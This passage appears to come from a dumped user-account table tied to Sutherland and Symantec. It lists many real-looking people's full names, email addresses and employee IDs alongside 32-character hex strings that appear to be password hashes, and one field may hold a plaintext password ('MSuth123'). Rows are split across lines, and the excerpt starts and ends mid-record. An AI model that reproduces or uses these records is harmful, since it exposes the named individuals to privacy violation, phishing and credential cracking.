80f-4a0f-b057-b7abbf5da01d,<blank>,<blank>,Deepesh_S@SUTH.COM,Sutherland,de8d7d8
486019550ffa706df58f4c79d,S,<blank>,Deepesh_S,Deepesh,NULL,NULL,NULL
34ad-444d-8919-f76c7b393062,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a314f87cb0a8745b63259536067d6963,P,<blank>,086567,Shashank,NULL,NULL,NULL
6a13-4eb6-9cd6-c85b8dd8854d,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,7cde2d38a3084754e8f0fcdd7ca8302b,Rajpal,<blank>,075978,Ravi,NULL,NULL,NUL
L
de0b-4ad8-b251-fad79277f509,CRQ000000653471 SP 8 May 2012,000-0000,shadab_shaikh
1@symantec.suth.com,Sutherland,061dd07ac2a75bee84b86ebc6ae771a1,Shaikh,<blank>,2
24431,Shadab,NULL,NULL,NULL
02d-4b2e-ac18-8d24776d86b1,<blank>,<blank>,Pratik_Bhavsar@SUTH.COM,Sutherland,10
1488cfa9520f7228de4091353014bb,Ashok,<blank>,Pratik_Ashok_Bhavsar,Pratik,NULL,NU
LL,NULL
ebd-4c27-9abe-c3f03f6ff94c,<blank>,<blank>,Praveen_G1@SUTH.COM,Sutherland,d0d7a2
3f690baa1e2fbb176cbf8c9a3d,Kumar,<blank>,Praveen_Kumar_G,Praveen,NULL,NULL,NULL
9523-4c72-b275-afaf11672374,CRQ000000236122-Vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,6d2708ff9bad61027ff279fdacf80bcd,Bautista,<blank>,114694,
Mark Anthony,NULL,NULL,NULL
505-4eba-9d89-9554aea7f9fc,<blank>,<blank>,PraveenKumar_S6@SUTH.COM,Sutherland,6
20981731b78dba457253e3be4259048,Kumar,<blank>,Praveen_Kumar_S,Praveen,NULL,NULL,
NULL
851-47a3-8378-d100fda51cb7,<blank>,<blank>,Praveen_Sukumaran@SUTH.COM,Sutherland
,ef31679e8c127eadb5f73878291e30bc,Kumar,<blank>,Praveen_Kumar_Sukumaran,Praveen,
NULL,NULL,NULL
7255-4e92-beaa-0db20e660519,CRQ000000379070 SP 31 OCT 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,75d7e16c2fa47f465ecfba01530e7d2d,C,<blank>,121654,Raja
,NULL,NULL,NULL
8835-4cfe-a924-9b868a646fdd,"CRQ000000602114 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,30cf1af1b2b3a3994d07e76548426937,Bulaso,<blank>
,222554,MaTheresa,NULL,NULL,NULL
1d1-4811-986b-474d3602289b,<blank>,<blank>,Priya_Salian@SUTH.COM,Sutherland,3c4d
8d0e19af14c150f174c22834c98f,Chandrashekar,<blank>,Priya_Chandrashekar_Salian,Pr
iya,NULL,NULL,NULL
d72-4c3b-8a60-276349e9d53c,<blank>,<blank>,Priya_George@suth.com,Sutherland,9c40
4a6f148c92746d89dfbaea86972f,George,<blank>,Priya_George_Leslie,Priya,NULL,NULL,
NULL
60b5-4265-bb3c-75c0ea8cbc1c,CRQ000000236171,000-000,tools_id@symantec.suth.com,S
utherland,ab539c58ff581b88c872af6ee0a99403,Dizon,<blank>,114786,Jasper,NULL,NULL
,NULL
35e-4d03-ac6c-c91084d685fb,<blank>,<blank>,Rajasree_A@SUTH.COM,Sutherland,5c7d16
65f93209dce2bc5ae27ee18200,A,<blank>,Rajasree_A,Rajasree,NULL,NULL,NULL
00f0-4e0e-9ee2-4230a3238f0e,"CRQ000000602156 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,909e0792c178c442cbd5f2b93e10b9e6,Ortega,<blank>
,222571,Jourina,NULL,NULL,NULL
63b8-4539-ac72-6b2792ff6326,CRQ000000341039-CLNP-20/09/2011,000-0000,minaz_shaik
h@symantec.suth.com,Sutherland,20763d3a0cfcb5baa47504485be728c2,Shaikh,<blank>,1
17121,Minaz,NULL,NULL,NULL
ec8-4060-82bb-734cfc6be10a,<blank>,<blank>,Jaideep_Singh@suth.com,Sutherland,4ea
7144db1a5f302e28561958e1be618,Singh,<blank>,Jaideep_Singh,Jaideep,NULL,NULL,NULL
5be0-4be8-b401-8c468131979c,CRQ000000341039-CLNP-20/09/2011,000-0000,sharmista_b
anerjee1@symantec.suth.com,Sutherland,f0a384e1b4023ddbc55909b85f54a4a1,Banerjee,
<blank>,116978,Sharmista,NULL,NULL,NULL
3642-4160-8bf2-a061af684e41,"CRQ000000730985 CLNP July 16,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,1ef40d3b8697a6b9455a4c8457c8b1ef,Kargutkar,<b
lank>,224607,Smita,NULL,NULL,NULL
3a1e-439f-87b4-b8a2e1aa55de,<blank>,<blank>,tools_id@symantec.suth.com,PM - 4/30
/2012 - CRQ000000642972,0599ebd13452bd0fab60627b1460ab75,J,<blank>,113287,Paul,N
ULL,NULL,NULL
439-4b6c-ab1f-069b0f4ad7fd,<blank>,<blank>,Kavitha_Chithambaran@SUTH.COM,Sutherl
and,c91b508d3732fa998a5bcd5dcc9f3c69,Chithambaran,<blank>,Kavitha_Chithambaran,K
avitha,NULL,NULL,NULL
d88-4131-a42d-442995ab8f4e,<blank>,<blank>,Kawaldeep_Hanspal@SUTH.COM,Sutherland
,523f1869ae0927d9e40ce653f6f28c73,Singh,<blank>,Kawaldeep_Singh_Hanspal,Kawaldee
p,NULL,NULL,NULL
9a8-4f1f-a479-be2f81e1ea98,<blank>,<blank>,Komal_Nadimkar@SUTH.COM,Sutherland,f1
35a0a6ff83e4de31d663a0d846c922,Rajaprasad,<blank>,Komal_Rajaprasad_Nadimkar,Koma
l,NULL,NULL,NULL
169-4eee-896f-8ac71b879f77,<blank>,<blank>,Konsam_Singh@SUTH.COM,Sutherland,859d
a30504fb91081a70224d4dff218a,Rakesh,<blank>,Konsam_Rakesh_Singh,Konsam,NULL,NULL
,NULL
d39-4d9f-9059-2ff0e73661bf,<blank>,<blank>,Mohammed_Fiaz@suth.com,Sutherland,803
5b05234a4a1e67b6d71c6ff87f821,Fiaz,<blank>,Mohammed_Fiaz,Mohammed,NULL,NULL,NULL
ca1-4fbc-985a-1bc0821e5ec1,<blank>,<blank>,Muralidharan_S@suth.com,Sutherland,0d
7ed4fa9b30ac53a4226bafe27360f8,Sundaram,<blank>,Muralidharan_Sundaram,Muralidhar
an,NULL,NULL,NULL
6f7-414c-b9b9-fbb70c171be5,<blank>,86255/2632350,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",5e88f3f312de76570a95e5efff6134cf,Abdul Kafoor,<bl
ank>,muhsin_abdulkafoor,Muhsin,NULL,NULL,NULL
8b7-4ad5-8da0-934e6c573ffc,<blank>,<blank>,Priya_Muthukrishnan@suth.com,Sutherla
nd,21935584f08f8e0f49ac9006756d0427,Muthukrishnan,<blank>,Priya_Muthukrishnan,Pr
iya,NULL,NULL,NULL
51d6-449f-b681-96393f2169f4,"CRQ000000340921-RJ-Sep 19, 2011",000-0000,johnreyto
niacao_sere@SUTH.COM,Sutherland,b0b6acc54734f4b952deee48180ec9ed,Serentas,<blank
>,120497,John Rey Toniacao,NULL,NULL,NULL
4df-437d-8d7a-6e63bc1cd661,<blank>,<blank>,Priyadarshi_Lahiri@SUTH.COM,Sutherlan
d,8eb79140e7f714016984a369a89e9b3c,Lahiri,<blank>,Priyadarshi_Lahiri,Priyadarshi
,NULL,NULL,NULL
f93-4b0c-bcff-e86b9784b66a,<blank>,<blank>,PriyankaHarilal_Panchal@SUTH.COM,Suth
erland,5641fea33545f3b1df707ef617c532ba,Harilal,<blank>,Priyanka_Harilal_Panchal
,Priyanka,NULL,NULL,NULL
e1bc-4fb5-9d6c-8c2a187fcb88,CRQ000000439571--VMD--06/12/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,3eb16341f493498fa6bbb9d7acc197a3,Mipana,<blank>,12278
3,Frances Cleuza Flores,NULL,NULL,NULL
9ca-48a7-b227-a18b7927b277,<blank>,<blank>,Prosenjit_Sarkar1@SUTH.COM,Sutherland
,7d8fb7b7355b2418d56d7d0da5539e75,Prabir,<blank>,Prosenjit_Prabir_Sarkar,Prosenj
it,NULL,NULL,NULL
78b-4c7a-9779-e79922e65264,<blank>,<blank>,Puneet_Deora@SUTH.COM,Sutherland,485c
b255f5b2ed8a9013cf25a49a7937,Pramod,<blank>,Puneet_Pramod_Deora,Puneet,NULL,NULL
,NULL
c71-42a1-a532-4d799dbd7c06,<blank>,<blank>,Punit_Bachhawat@SUTH.COM,Sutherland,8
33210b3801cb640a6f87fb4174b96ad,Maganraj,<blank>,Punit_Maganraj_Bachhawat,Punit,
NULL,NULL,NULL
e21-4cb7-ad03-acbd8d24599b,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,7572665f1106f34aa32e5683ece63c16,Singh,<blank>,Pushpinder_Singh_Hooghan,Pushpin
der,NULL,NULL,NULL
d8a-4f7c-90bb-0d145c80c756,<blank>,<blank>,Rachana_Sabharwal@SUTH.COM,Sutherland
,5449c9548a0462d0a7815c1caf10abc4,Sabharwal,<blank>,Rachana_Sabharwal,Rachana,NU
LL,NULL,NULL
ac3-41f4-ab54-cffd6b2a10f5,<blank>,<blank>,RadhikaAnjikkath_Jayappan@SUTH.COM,Su
therland,cf91157ec29c62d028a66f259835dab8,Anjikkath,<blank>,Radhika_Anjikkath_Ja
yappan,Radhika,NULL,NULL,NULL
bc7d-4902-9dab-e86d601eb5d6,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,02622d89cc3e467f03770e072b2b510c,Jose,<blank>,089669,Subi,NULL,NULL,NULL
5b79-45c7-96b5-e955aad1783c,"CRQ000000340917-RJ-Sep 19, 2011",000-0000,rheagrace
adlawon_tam@SUTH.COM,Sutherland,e791cd06892caa120914021244b2bec9,Tampipi,<blank>
,120498,Rhea Grace Adlawon,NULL,NULL,NULL
a49-474a-bacf-08d924ed8880,<blank>,<blank>,Ragam_R@SUTH.COM,Sutherland,d848fc61a
67c0c995145376a0bd4806c,M,<blank>,Ragam_M_R,Ragam,NULL,NULL,NULL
3fa-4989-9b78-69982129df82,<blank>,<blank>,Ragavendran_S2@SUTH.COM,Sutherland,51
2f54debcc6a31a58157ca95c14d26e,S,<blank>,Ragavendran_S,Ragavendran,NULL,NULL,NUL
L
b2b0-40cf-b19c-674c94a28f1c,NA 1st April 2011,CRQ000000230529,accounts@symantec.
teleperformance.gr,<blank>,106486283e1634d4802286500850d6dc,Simeonidis,<blank>,1
09063,Constantinos,NULL,NULL,NULL
a4cd-4d45-83f6-f8ce09f7b400,CRQ000000598523--vmd--21/03/2012,000-000,rosemarie_m
analo@Suth.com,Sutherland,56bf9b8914297d28b0bfd42b0d3a8a58,Manalo,<blank>,222533
,Rosemarie,NULL,NULL,NULL
859f-4b6d-b25d-240fed3e6de5,NA 1st April 2011,CRQ000000230529,accounts@symantec.
teleperformance.gr,<blank>,94387ff06eeeb9d75b87d1876a766db2,Vavvas,<blank>,10291
4,Konstantinos,NULL,NULL,NULL
6a0-4223-aa0b-47b9201fdfaa,<blank>,<blank>,Raghunandan_M@SUTH.COM,Sutherland,b1e
d5c45f5670f94efde37563adf29aa,M,<blank>,Raghunandan_M,Raghunandan,NULL,NULL,NULL
d6d-4cca-bfad-ccb0fbab9dc2,<blank>,<blank>,Raghunath_S@SUTH.COM,Sutherland,32e89
31e687649017d1600d7cd2146d7,S,<blank>,Ragunath_S,Ragunath,NULL,NULL,NULL
6ae9-4dbc-9bbd-08a82d2c6cb8,<blank>,<blank>,stephen_franco@symantec.com,CRQ00000
0230993 - PR - 4/1/2011,8764e2855e670b38103f3aed65476fb0,Franco,<blank>,106578,S
tephen ,NULL,NULL,NULL
8cf-4f2f-a8dc-421916d43531,<blank>,<blank>,rraja@suth.com,Sutherland,f65c4025423
5f012995a62188b57a17b,Ramaswamy,<blank>,Rajagopal_Ramaswamy,Rajagopal,NULL,NULL,
NULL
3c1-4af5-9763-2e6d7de58a53,<blank>,<blank>,Rajapriya_SR@SUTH.COM,Sutherland,60fd
ec1747069d53b56790a94274ac74,S,<blank>,Rajapriya_S_R,Rajapriya,NULL,NULL,NULL
26a-49c1-89de-c73095fc7c50,<blank>,<blank>,arjun_phape@symantec.com,Symantec,f1d
205016c5d259a59276b0814fe9816,Phape,<blank>,arjun_phape,Arjun,NULL,NULL,NULL
4a53-4a8a-95b8-a0663bb95235,CRQ000000598533--vmd--21/03/2012,000-000,raquel_ming
oy@Suth.com,Sutherland,930d32264fce0e5afa32cebfc413932b,Mingoy,<blank>,222535,Ra
quel,NULL,NULL,NULL
9d8-46f7-8435-6258ce3e509f,<blank>,<blank>,Dinesh_V3@SUTH.COM,Sutherland,1e21d22
561c0fb6e86f186637140be42,V,<blank>,Dinesh_V3,Dinesh,NULL,NULL,NULL
b2d-4309-a7a7-3b49f8b50825,<blank>,<blank>,Padmavathy_R@suth.com,Sutherland,52f4
d9145f3d2ff04242c9a35a8a710b,Ramachandran,<blank>,Padmavathy_Ramachandran,Padmav
athy,NULL,NULL,NULL
52e-40e1-98e2-b9bc95e5ea20,<blank>,<blank>,Sridhar_T@SUTH.COM,Sutherland,7c1aea5
4dda98722e9003f5e7fbad730,T,<blank>,Sridhar_T,Sridhar,NULL,NULL,NULL
e904-46d6-a876-1a7de772348d,CRQ000000272511--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,72cf0ca26e1033369cedd8704c80d5af,Morales,<blank>,1169
03,Alejandro Lachica,NULL,NULL,NULL
312-4b19-ac3a-7fb99a70dfb4,<blank>,<blank>,Srinidhi_P@SUTH.COM,Sutherland,e3458e
10321091c8009470b214cffb6c,P,<blank>,Srinidhi_P,Srinidhi,NULL,NULL,NULL
8acd-461b-bfe4-e991cee35f27,CRQ000000718039--vmd--03/07/2012,<blank>,somnath_gho
sh@suth.com,sutherland,3b3ea31f315f72016eb8e7875a3f8686,Ghosh,<blank>,227392,Som
nath,NULL,NULL,NULL
d23-46c3-aec7-1bf90e6fc2d1,<blank>,<blank>,srinivas_kompela@suth.com,Sutherland,
9616f281dd112f20c7b1fa71e9701f8a,Kompella,<blank>,Srinivas_Kompella,Srinivas,NUL
L,NULL,NULL
35c-43b5-a409-070712bca554,<blank>,<blank>,SripaulRajkumar_M@SUTH.COM,Sutherland
,e2fb9548f05ec00a5a44069d509e56fd,Rajkumar,<blank>,Sripaul_Rajkumar_M,Sripaul,NU
LL,NULL,NULL
def-4134-b592-bbbd9c86140e,<blank>,<blank>,Sriraj_R@SUTH.COM,Sutherland,bdda9538
cd3b5d358bc986c761d4d08f,R,<blank>,Sriraj_R,Sriraj,NULL,NULL,NULL
ee9-4c13-8e29-e3054110351c,<blank>,<blank>,RSriram2@suth.com,Sutherland,77f5b337
88ab1c5e8e430c2ed5e1c246,Ramachandran,<blank>,Sriram_Ramachandran,Sriram,NULL,NU
LL,NULL
142-419a-88bb-9dcceeec4c8e,<blank>,<blank>,Srivatsan_P@SUTH.COM,Sutherland,173f4
70af9be19c6b009cc1a577b8af2,P,<blank>,Srivatsan_P,Srivatsan,NULL,NULL,NULL
cd7-49b4-b1e0-81872d9fd883,<blank>,<blank>,Srividya_Pillai@SUTH.COM,Sutherland,2
19a32391da34b37badfd24823d3ba63,Pillai,<blank>,Srividya_Pillai,Srividya,NULL,NUL
L,NULL
aa2-4bea-b887-3c69020da5b4,<blank>,<blank>,Subhash_Kunnath@SUTH.COM,Sutherland,0
b3214c9283928e06a09ca11c0fb7b67,Kumar,<blank>,Subhash_Kumar_Kunnath,Subhash,NULL
,NULL,NULL
f8a-46fe-8864-3e54613211a3,<blank>,<blank>,sucheta_jambhule@suth.com,Sutherland,
a71946ad165fe65d20bede98bcec484f,Damodar,<blank>,Sucheta_Damodar_Jambhule,Suchet
a,NULL,NULL,NULL
8c7-495d-8d6b-e5dabc85b7fc,<blank>,<blank>,Sudeesh_M@SUTH.COM,Sutherland,ba27d4e
5af4bb2cd74179250efda97e9,M,<blank>,Sudeesh_M,Sudeesh,NULL,NULL,NULL
38e-4b0d-975e-35894097eaab,<blank>,<blank>,Sunil_D@suth.com,Sutherland,ed9046a1b
a535ec55b71ebffea9c7368,Harihar,<blank>,Sunil_Harihar_Dave,Sunil,NULL,NULL,NULL
a63-4379-b204-f8a2b15e9b27,<blank>,<blank>,SunilKumar_B@SUTH.COM,Sutherland,4a03
8d00e3e5eab630f922c5a3432ba9,Kumar,<blank>,Sunil_Kumar_B,Sunil,NULL,NULL,NULL
b1f-466d-87fb-c6bd342a595a,<blank>,<blank>,Sunilkumar_k@suth.com,Sutherland,f2bf
cdfdb87f1591642db19572b8fbb2,Kumar,<blank>,Sunil_Kumar_Kovalluri,Sunil,NULL,NULL
,NULL
1f9-4ca0-95c6-32656fc15caf,<blank>,<blank>,sunil_madhiraju@suth.com,Sutherland,8
20b4ca4d33a8c7e4d533c679befbe01,Kumar,<blank>,Sunil_Kumar_Madirajuvenkat,Sunil,N
ULL,NULL,NULL
bde-4511-b1b4-868ad2148306,<blank>,<blank>,Sunil_VP@SUTH.COM,Sutherland,774f4ff3
c0ae96cb4579e27e310da9d3,Mohandas,<blank>,Sunil_Mohandas_V_P,Sunil,NULL,NULL,NUL
L
d61-431c-b0ea-05e9eb7b4edd,<blank>,<blank>,Sunil_Sonawane@SUTH.COM,Sutherland,91
aab3aa735ca6f45dae2e0b85e7abea,Sambhajirao,<blank>,Sunil_Sambhajirao_Sonawane,Su
nil,NULL,NULL,NULL
b84-4ace-b4e3-b65d8b9910a1,<blank>,<blank>,SunithaKumari_Panicker@SUTH.COM,Suthe
rland,433ac94f582ef24f780bbe6d46e4127d,Kumari,<blank>,Sunitha_Kumari_Panicker,Su
nitha,NULL,NULL,NULL
4c3-44fd-948e-36ed230b5a43,<blank>,<blank>,Ventapalli_Sekar@SUTH.COM,Sutherland,
4d34d8e141fcb1eafadd1b3cba904a96,Chandra,<blank>,Ventapalli_Chandra_Sekar,Ventap
alli,NULL,NULL,NULL
f96-46c7-90e1-ea0bdeb9f92f,<blank>,<blank>,Verghese_Kooran@SUTH.COM,Sutherland,1
5a8413710d7455c492758b31facc302,Elias,<blank>,Verghese_Elias_Kooran,Verghese,NUL
L,NULL,NULL
656-4453-85cf-384da128f71f,<blank>,<blank>,Vicky_Khilnani@SUTH.COM,Sutherland,4b
f675201f467990414c0fffb4fe929e,Hari,<blank>,Vicky_Hari_Khilnani,Vicky,NULL,NULL,
NULL
e35c-45a5-a555-fc6c3a3d3fef,<blank>,EMPROV,tools_id@symantec.suth.com,SUTHERLAND
,be925a9cd869f593405c5c31cf8ab3c1,MSuth123,<blank>,098212,Dhanasekaran,NULL,NULL
,NULL
052-4019-be51-ea45fe9e9ef2,<blank>,<blank>,Vidhya_R2@suth.com,Sutherland,6042a61
074d20a1a27a554c01275538f,R,<blank>,Vidhya_R,Vidhya,NULL,NULL,NULL
0c4-4546-9153-879fdaba0412,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,595a18462ee20686bfb20a82aaaba6c5,G,<blank>,091405,Goutham,NULL,NULL,NULL
c74-41e0-8a8d-25ae62244400,<blank>,<blank>,Vidya_Jaya@SUTH.COM,Sutherland,2ab9cf
104751413119310b8b41ff1843,Jaya,<blank>,Vidya_Jaya,Vidya,NULL,NULL,NULL
48b-4c29-bb02-c9e4e18c5f50,<blank>,<blank>,Vignesh_R@SUTH.COM,Sutherland,70c809c
556a3f76485aa0aea09392d79,R,<blank>,Vignesh_R,Vignesh,NULL,NULL,NULL
da7-4945-9d94-7531d801372f,<blank>,<blank>,Vijay_Malkani@SUTH.COM,Sutherland,dc8
753e04097b883f50fc898b71b8d50,N,<blank>,Vijay_N_Malkani,Vijay,NULL,NULL,NULL
7ea-4a4b-b165-bd378580a48f,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,624204200dff40d06adac3e394c2b1e9,Eddie,<blank>,Stanford_Eddie_Fernandes,Stanfor
d,NULL,NULL,NULL
51e-44fe-bdbd-c2552e6e6a2e,<blank>,<blank>,Stanley_Lawrans@suth.com,Sutherland,d
d6615edd973e0ea357367eea3931f71,Lawrans,<blank>,Stanley_Lawrans,Stanley,NULL,NUL
L,NULL
8a03-446f-a5e5-b302b7021a4d,CRQ000000601618--vmd--22/03/2012,000-000,johoney_ber
nardino@Suth.com,Sutherland,0e33866be26a204bd63e0f7255f419dc,Bernardino,<blank>,
222604,Johoney,NULL,NULL,NULL
164-462d-aa5f-1f84067d869e,<blank>,<blank>,Stella_Robert@suth.com,Sutherland,8b8
fd69cc05a53889a79e319bc359264,Jancy,<blank>,Stella_Jancy_Robert_Williams,Stella,
NULL,NULL,NULL
e45-4ff2-a6a2-f3549b61412a,<blank>,<blank>,Stella_NG@SUTH.COM,Sutherland,cc6dbb3
c5b1e70ed350156bfdc8ac6b1,Mamiya,<blank>,Stella_Mamiya_N_G,Stella,NULL,NULL,NULL
24c-4ebb-9198-f627ea2dce44,<blank>,<blank>,Stephen_L@SUTH.COM,Sutherland,4f12a80
8173cd1a399a548eb9630fa08,Emmanuel,<blank>,Stephen_Emmanuel_Lawrence,Stephen,NUL
L,NULL,NULL
5da-4fe1-b2d8-9499537ce7ab,<blank>,<blank>,Subarajesh_S1@SUTH.COM,Sutherland,44a
45894932dcb64048cf3623fc2bb0a,S,<blank>,Subarajesh_S,Subarajesh,NULL,NULL,NULL
1df-4222-89f1-fa4371ecc9a1,<blank>,89191,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",1bdfc31723bd4800a4f0ff8aaa730c51,Sharma,<blank>,anil_shar
ma,Anil,NULL,NULL,NULL
949c-4116-9164-9aba5d668a78,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,Sutherland,b19270f7c6ab55e92df74a42680a13fe,Francis,<blank>,099852,DennisC
ajetan,NULL,NULL,NULL
30d-4a7c-9363-98b380aa91ae,<blank>,<blank>,Suresh_T@SUTH.COM,Sutherland,b55d7d22
922234b1cabb999fa77fb109,T,<blank>,Suresh_T,Suresh,NULL,NULL,NULL
17da-48ca-9386-aabee9bbf472,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,Sutherland,ed6950a088c426cc986a29433ca0e3b2,Sujatha Gunaseelan,<blank>,086
553,Mercia,NULL,NULL,NULL
5d7c-45d2-8014-66ed7cd3cc3c,"CRQ000000201437-RJ-Feb14,2011",000-0000,tools_id@sy
mantec.suth.com,Sutherland,607e9a16a9438c6f2690819de958202d,M,<blank>,113040,Pra
kash,NULL,NULL,NULL
587-467e-a0ba-95762f67e079,<blank>,<blank>,Sushil_Pattni@SUTH.COM,Sutherland,0dc
bafc4e5903cd313e010bb6b0838b5,Jethalal,<blank>,Sushil_Jethalal_Pattni,Sushil,NUL
L,NULL,NULL
2dc-4ca0-871d-09080bab0d04,<blank>,<blank>,Theresa_Monteiro@SUTH.COM,Sutherland,
12d985c3188943e0a08e5f500c67c253,Moses,<blank>,Theresa_Moses_Monteiro,Theresa,NU
LL,NULL,NULL
6c7-4ab3-8084-e1ab36f154bf,<blank>,<blank>,Thomas_Antony@SUTH.COM,Sutherland,7ac
e4b1b84e8eb930b11eea847a5e488,Antony,<blank>,Thomas_Antony,Thomas,NULL,NULL,NULL
c53-4797-b272-e5ca4af61fe2,<blank>,<blank>,Thomas_K@SUTH.COM,Sutherland,777fdb1a
6f060586edf4aed407203ef8,Antony,<blank>,Thomas_Antony_K,Thomas,NULL,NULL,NULL
4572-47ec-af8d-fdffeada09f0,CRQ000000603592--vmd--23/03/2012,<blank>,francesnico
le_hernan@Suth.com,Sutherland,0fdfd550b447fe87cf452e12b815380f,Hernandez,<blank>
,222669,FrancesNicole,NULL,NULL,NULL
9197-4987-94f8-2924d4f79050,CRQ000000603598--vmd--23/03/2012,<blank>,maelyn_laur
e@Suth.com,Sutherland,31e1f833dd73f22a10f9965fb0b44761,Laure,<blank>,222671,Mael
yn,NULL,NULL,NULL
cb5-41cf-8be0-9cd42cdc1946,<blank>,<blank>,Thomas_Vinu@SUTH.COM,Sutherland,847df
f3e2d859789bf871380643015c0,T,<blank>,Thomas_T_Vinu,Thomas,NULL,NULL,NULL
fc6-455c-9ebf-b0cde0284065,<blank>,<blank>,Tilaksi_Gada@SUTH.COM,Sutherland,474a
0a7c7233aa58b55548f5226ef63d,Pasu,<blank>,Tilaksi_Pasu_Gada,Tilaksi,NULL,NULL,NU
LL
ba4c-4a58-88a9-785b61047661,"CRQ000000439518-RJ-Dec6, 2011",000-0000,manjunath_s
rinivasan@SUTH.com,Sutherland,2c92b26efd8691398f0e3adc163bcb36,Srinivasan,<blank
>,122768,Manjunath,NULL,NULL,NULL
811-42db-9657-cea15d94b89f,<blank>,<blank>,Tom_Francis@SUTH.COM,Sutherland,86fb6
64c39f3bcb8c963189456aee07a,Francis,<blank>,Tom_Francis,Tom,NULL,NULL,NULL
3067-4d41-9fb0-4a9e0f3b8efa,CRQ000000603601--vmd--23/03/2012,<blank>,jomilyn_leo
nor@Suth.com,Sutherland,57eb27fa05baf6c686374a9b994e5521,Leonor,<blank>,222672,J
omilyn,NULL,NULL,NULL
bb8-4c87-aba6-64daddd55788,<blank>,<blank>,Tony_Vaippammadom@SUTH.COM,Sutherland
,5c25d96628f94429fd3a5bb5306d9d11,G,<blank>,Tony_G_Vaippammadom,Tony,NULL,NULL,N
ULL
c1d-40fb-9470-fd70a62a9d39,<blank>,<blank>,Tony_John@SUTH.COM,Sutherland,a57b8b4
5d3cc0b95486525b46df6515b,John,<blank>,Tony_John,Tony,NULL,NULL,NULL
255-479d-9fe9-f7aac80a748a,<blank>,<blank>,TresaDona_Joy@SUTH.COM,Sutherland,93a
e3b486ae7c47c5dd161a57766db6e,Dona,<blank>,Tresa_Dona_Joy,Tresa,NULL,NULL,NULL
25b-491e-90f8-7389b35a7fff,<blank>,<blank>,Tushar_Mitra@SUTH.COM,Sutherland,25b4
4ca7a7e951ef8c3312302ef1035d,Sudhin,<blank>,Tushar_Sudhin_Mitra,Tushar,NULL,NULL
,NULL
7ad-4df0-9bed-80a70b6cfa28,<blank>,<blank>,Tushar_Lade@SUTH.COM,Sutherland,881e8
472521876874b217590b70c007d,Vilas,<blank>,Tushar_Vilas_Lade,Tushar,NULL,NULL,NUL
L
a915-4280-a5ba-2000ea9bb491,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,28f793b26e28b982336393ac7ffbc215,KrishnaR,<blank>,rajeev_krishnar_cc,Raje
ev ,NULL,NULL,NULL
55d-4d0e-9137-ddd8f8577c1d,<blank>,<blank>,Subisha_V@SUTH.COM,Sutherland,6f8f7b0
4c3fd87433e73ce78012b7f78,V,<blank>,Subisha_V,Subisha,NULL,NULL,NULL
d3d5-4e9d-9fdc-8a6dd7deea77,CRQ000000379064 SP 31 OCT 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,9bfc082d40ccb1c1457d433f2f71f1db,S,<blank>,121652,Dhar
sala,NULL,NULL,NULL
044-495f-93b5-6384e5a4236c,<blank>,<blank>,Sudha_S@suth.com,Sutherland,4c8624923
2c3acb25d0b410dce617a30,Sridaran,<blank>,Sudha_Sridaran,Sudha,NULL,NULL,NULL
297-4dcc-83c0-57a94ace57a7,<blank>,<blank>,Sushil_Gogate@SUTH.COM,Sutherland,56c
df9a3590cb2da06d986ea9a37328b,Sitaram,<blank>,Sushil_Sitaram_Gogate,Sushil,NULL,
NULL,NULL
2e7-4c80-8897-40051fa7567c,<blank>,2633282,Stools_id@symantec.suth.com,Sutherlan
d,d9494cbc8963a1e5ab1920b8a15a3b5a,Nandkumar,<blank>,Swapnil_Nandkumar_Champaner
kar,Swapnil,NULL,NULL,NULL
2f7-4d2c-bb42-9a21a4528a0f,<blank>,<blank>,Swapnil_Ingle@suth.com,Sutherland,623
f6bc64cbdd6fa7c2b44d94ccebb46,Narendra,<blank>,Swapnil_Narendra_Ingle,Swapnil,NU
LL,NULL,NULL
73e-4a80-b93e-fe92c9314426,<blank>,<blank>,Swapnil_Nagwekar@SUTH.COM,Sutherland,
e0a98429f1b5593fc1eaee43e737b38a,Vikas,<blank>,Swapnil_Vikas_Nagwekar,Swapnil,NU
LL,NULL,NULL
ef3-4577-9e50-f7d0379cccbb,<blank>,<blank>,Swaranjeet_Chhabra@SUTH.COM,Sutherlan
d,e1322cdeea29b553d23b32aa5ffba0e4,Singh,<blank>,Swaranjeet_Singh_Chhabra,Swaran
jeet,NULL,NULL,NULL
46a-482d-abf0-ea7dce2bd560,<blank>,<blank>,SwatiAbhay_Verma@SUTH.COM,Sutherland,
a85d74c69d0d0a6a40b5b1338cfade29,Abhay,<blank>,Swati_Abhay_Verma,Swati,NULL,NULL
,NULL
175-40bb-be86-7309d0f9b26a,<blank>,<blank>,SwatiRamesh_Dongre@SUTH.COM,Sutherlan
d,c670a8c9ebda8c940d0e0ad4b0d24923,Ramesh,<blank>,Swati_Ramesh_Dongre,Swati,NULL
,NULL,NULL
622-4789-b1fc-65c0c3ba2d17,<blank>,<blank>,Sweta_Modi@SUTH.COM,Sutherland,80b81a
79715614f2982469ea7645a119,Modi,<blank>,Sweta_Modi,Sweta,NULL,NULL,NULL
3f4-4105-8a68-1205bf35bf8a,<blank>,<blank>,Sweta_Bamne@SUTH.COM,Sutherland,d7e95
910b32c79686b255657ab1b238f,Sham,<blank>,Sweta_Sham_Bamne,Sweta,NULL,NULL,NULL
824d-4587-87b3-b0515354bad7,"CRQ000000682561 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,7df3ee62897206bcb09f268c0a604095,Trott,<blank
>,226234,Jennifer,NULL,NULL,NULL
0755-45c7-bed4-83ac89a3024a,CRQ000000206848-VMD-23/02/11,000-0000,tools_id@syman
